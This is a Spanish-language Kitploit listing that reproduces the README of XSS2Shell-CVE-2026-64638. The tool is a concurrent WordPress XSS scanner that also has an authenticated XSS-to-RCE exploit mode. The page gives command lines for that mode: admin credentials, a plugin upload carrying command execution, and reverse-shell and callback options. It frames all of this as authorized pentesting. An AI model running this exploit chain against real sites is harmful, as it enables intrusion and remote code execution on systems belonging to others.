Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
XSS2Shell-CVE-2026-64638 — Escáner de seguridad de WordPress que identifica versiones, detecta XSS reflejado en múltiples objetivos de manera concurrente y admite un flujo de trabajo de explotación autenticada de XSS a RCE para pruebas autorizadas. | Kitploit
Herramientas/GitHubGitHub/mr-leonardogomes/xss2shell-cve-2026-64638
ReconocimientoEscáneres de Vulnerabilidades WebExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubmr-leonardogomes/xss2shell-cve-2026-64638

XSS2Shell-CVE-2026-64638

Escáner de seguridad de WordPress que identifica versiones, detecta XSS reflejado en múltiples objetivos de manera concurrente y admite un flujo de trabajo de explotación autenticada de XSS a RCE para pruebas autorizadas.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
17hace 1 mesAún no revisado
Compartir

🔍 @Mr-LeonardoGomes

💀 XSS2Shell-CVE-2026-64638

Versão 2026 Status Ativo PRs Bem-vindos Licença MIT
Feito com amor Bug Bounty 2026 Pentest Metodologia

Metodología de caza de bugs 2026

Escáner multiobjetivo XSS2Shell

Desarrollador: Crédito: YogaGymn

Utilidad PoC/escaneo para pruebas de seguridad autorizadas en WordPress. El proyecto contiene un flujo de explotación para un único objetivo y un modo solo escaneo multiobjetivo concurrente.

Importante: Use este proyecto solo en instalaciones de WordPress que usted posea o para las cuales tenga autorización explícita para probar. El escáner multiobjetivo está limitado intencionalmente a la identificación de versión y a la detección de reflexión XSS; no realiza captura de credenciales, carga de plugins ni RCE contra una lista de objetivos.

Funcionalidades

Modo de objetivo único

El script original admite:

  • Identificación de la versión de WordPress.
  • Detección de reflexión XSS.
  • Modos auto, xss y direct.
  • Flujo de autenticación directa en WordPress y carga de plugins.
  • Funcionalidad de cadena XSS presente en el PoC original.
  • Funcionalidad opcional de callback/reverse-shell presente en el PoC original.

Modo multiobjetivo

El escáner añadido admite:

  • Lectura de objetivos desde un archivo de texto.
  • Eliminación de objetivos duplicados.
  • Escaneo concurrente con ThreadPoolExecutor.
  • Número configurable de workers.
  • Detección de la versión de WordPress.
  • Detección de reflexión XSS.
  • Informe de progreso.
  • Resultados guardados en el mismo orden que el archivo de entrada.
  • Estadísticas resumidas.

El modo multiobjetivo no llama a las funciones originales de RCE.

Requisitos

  • Python 3.9+
  • requests

Instale la dependencia:

root@kitploit:~
python3 -m pip install requests

Si su distribución de Linux usa un entorno Python administrado externamente, use un entorno virtual:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install requests

Instalación

Clone o copie el proyecto: Original del exploit yogaGymn

root@kitploit:~
git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638

O simplemente coloque:

root@kitploit:~
xss2shell.py

en su directorio de trabajo.

Escáner de Múltiples Objetivos

Cree un archivo llamado targets.txt o alvos.txt:

root@kitploit:~
https://example1.test
https://example2.test
https://example3.test

Los comentarios y las líneas vacías se ignoran:

root@kitploit:~
# Alvos de laboratório autorizado
https://example1.test

https://example2.test

Ejecute el escáner:

root@kitploit:~
python3 xss2shell.py -i targets.txt

La concurrencia predeterminada es de 10 workers.

Cambiar la concurrencia

Por ejemplo, use 20 workers:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 20

Para un laboratorio pequeño:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 5

No elija un número de workers innecesariamente alto, ya que esto puede aumentar la carga de conexiones y activar límites de tasa o controles defensivos.

Cambiar el archivo de salida

root@kitploit:~
python3 xss2shell.py \
  -i targets.txt \
  --workers 10 \
  --output results.txt

Ejemplo de salida

root@kitploit:~
[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE

[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)

=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected  : 1
Not detected  : 2
Errors        : 0
Results saved : scan_results.txt

Formato del resultado

El archivo scan_results.txt predeterminado utiliza campos separados por tabulaciones:

root@kitploit:~
TARGET  WORDPRESS_VERSION  XSS_STATUS  XSS_DETAIL

Ejemplo:

root@kitploit:~
https://example1.test    6.8.2    XSS_NOT_DETECTED          ESCAPED
https://example2.test    6.7.1    XSS_REFLECTION_DETECTED   AREA_BYPASS

Valores de estado XSS


Estado Significado


XSS_REFLECTION_DETECTED El escáner detectó el comportamiento de reflexión HTML probado. Esto no es por sí mismo una prueba de RCE.

XSS_NOT_DETECTED La reflexión probada no fue detectada.

ERROR La comprobación encontró una excepción.

Valores de detalles de XSS

El escáner puede informar detalles como:

  • RAW_HTML
  • AREA_BYPASS
  • ESCAPED
  • STRIPPED
  • NOT_REFLECTED

Estos valores describen la respuesta observada por la rutina de detección; deben validarse manualmente antes de considerar un resultado como una vulnerabilidad confirmada.

Uso con un solo objetivo

El script original también admite argumentos de objetivo único.

Modo automático

root@kitploit:~
python3 xss2shell.py \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

Modo directo

root@kitploit:~
python3 xss2shell.py \
  --mode direct \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

Modo XSS

root@kitploit:~
python3 xss2shell.py \
  --mode xss \
  --lhost 192.0.2.10 \
  http://authorized-lab.test

Los flujos de trabajo XSS/directos pueden crear o activar un plugin que contenga funcionalidad de ejecución de comandos. Úselos solo en un entorno de pruebas autorizado.

Referencia de la CLI

root@kitploit:~
usage: xss2shell.py [-h]
       [-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
       [--mode {auto,xss,direct}]
       [-u USERNAME] [-p PASSWORD]
       [--lhost LHOST] [--lport LPORT]
       [--slug SLUG] [--callback-port CALLBACK_PORT]
       [--no-rev]
       [target]

Argumentos


Argumento Descripción


target URL de un solo objetivo.

-i, --input Archivo que contiene múltiples objetivos.

--output Archivo de salida para resultados multiobjetivo. Predeterminado: scan_results.txt.

--workers Número de workers concurrentes. Predeterminado: 10.

--mode Modo original de un solo objetivo: auto, xss o direct.

-u, --username Nombre de usuario de WordPress para el flujo directo/de respaldo original.

-p, --password Contraseña de WordPress para el flujo directo/de respaldo original.

--lhost Host de callback/reverse-shell para el PoC original.

--lport Puerto de reverse-shell. Predeterminado: 4444.

--slug Slug del plugin. Predeterminado: xss2shell.

--callback-port Puerto del servidor de callback. Predeterminado: 9090.

--no-rev Omitir la activación de reverse-shell en el flujo original.

Cómo funciona el escaneo simultáneo

El modo de múltiples objetivos utiliza el siguiente recurso de Python:

root@kitploit:~
ThreadPoolExecutor

Cada objetivo se envía como una tarea de escaneo independiente:

root@kitploit:~
targets.txt
     |
     v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ... 
+----+----+----+----+
  |    |    |    |
  v    v    v    v
 WP   WP   WP   WP
 XSS  XSS  XSS  XSS
  |    |    |    |
  +----+----+----+
        |
        v
   scan_results.txt

Los resultados se recopilan a medida que las tareas se completan, mientras que la salida final se genera siguiendo el orden original de los objetivos.

Alcance y seguridad

El modo de múltiples objetivos está diseñado para evaluaciones de seguridad autorizadas y entornos de laboratorio.

Flujo de trabajo recomendado:

  1. Obtenga autorización por escrito.
  2. Incluya solo dominios/IPs autorizados en el archivo targets.txt.
  3. Comience con un número reducido de workers (procesos de ejecución).
  4. Analice la salida del escáner.
  5. Valide manualmente los hallazgos relevantes.
  6. Documente las evidencias y la remediación.

No utilice el escáner contra sistemas de terceros sin permiso.

Limitaciones

El escáner no es una herramienta completa de evaluación de vulnerabilidades.

En particular:

  • Una reflexión HTML detectada no prueba automáticamente la existencia de una vulnerabilidad XSS explotable.
  • La versión de WordPress obtenida de endpoints públicos puede estar ausente o ser incorrecta.
  • El estado unknown (desconocido) no significa que el objetivo sea vulnerable.
  • Los errores de red pueden generar resultados incompletos.
  • El comportamiento de WAF/CDN puede afectar la detección.
  • El escáner no determina la explotabilidad ni la posibilidad de RCE en el modo de múltiples objetivos.
  • Los resultados deben verificarse manualmente antes de informar una vulnerabilidad.

Estructura del proyecto

root@kitploit:~
.
├── xss2shell.py
├── targets.txt
└── scan_results.txt

Licencia

No había información de licencia en el código fuente proporcionado.

Si este proyecto se publica públicamente, agregue un archivo de licencia explícito, como LICENSE. Este código es un desarrollo posterior del código original de ZSecurity.

Descargar herramienta